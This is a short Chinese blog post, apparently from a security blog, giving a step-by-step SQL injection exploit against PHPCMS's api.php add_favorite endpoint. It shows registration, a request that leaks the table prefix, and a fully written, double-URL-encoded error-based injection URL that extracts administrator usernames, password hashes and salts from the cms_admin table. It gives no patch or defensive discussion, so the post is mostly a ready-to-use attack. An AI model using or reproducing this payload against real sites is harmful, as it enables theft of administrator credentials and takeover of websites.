漏洞形成原因就不多说了 文件在phpcms/api.php 有兴趣的盆友可以多去挖一挖phpcms的洞子
主要利用过程:
第一步:注册一个用户
http://www.i0day.com//index.php?m=member&c=index&a=register&siteid=1

第二步:访问链接爆表前缀

http://www.i0day.com//api.php?op=add_favorite&url=wooyun.in&title=%2527   表前缀:cms_

第三步:爆管理账户密码

红色为要修改的地方

  1. http://www.i0day.com//api.php?op=add_favorite&url=cms&title=%2527%2520and%2520%2528select%25201%2520from%2528select%2520count%2528%252a%2529%252Cconcat%2528%2528select%2520%2528select%2520%2528select%2520concat%25280x23%252Ccast%2528concat%2528username%252C0x3a%252Cpassword%252C0x3a%252Cencrypt%2529%2520as%2520char%2529%252C0x23%2529%2520from%2520cms_admin%2520LIMIT%25200%252C1%2529%2529%2520from%2520information_schema.tables%2520limit%25200%252C1%2529%252Cfloor%2528rand%25280%2529%252a2%2529%2529x%2520from%2520information_schema.tables%2520group%2520by%2520x%2529a%2529%2520and%2520%25271%2527%253D%25271

转载文章请注明,转载自:小马's Blog https://www.i0day.com

本文链接: https://www.i0day.com/899.html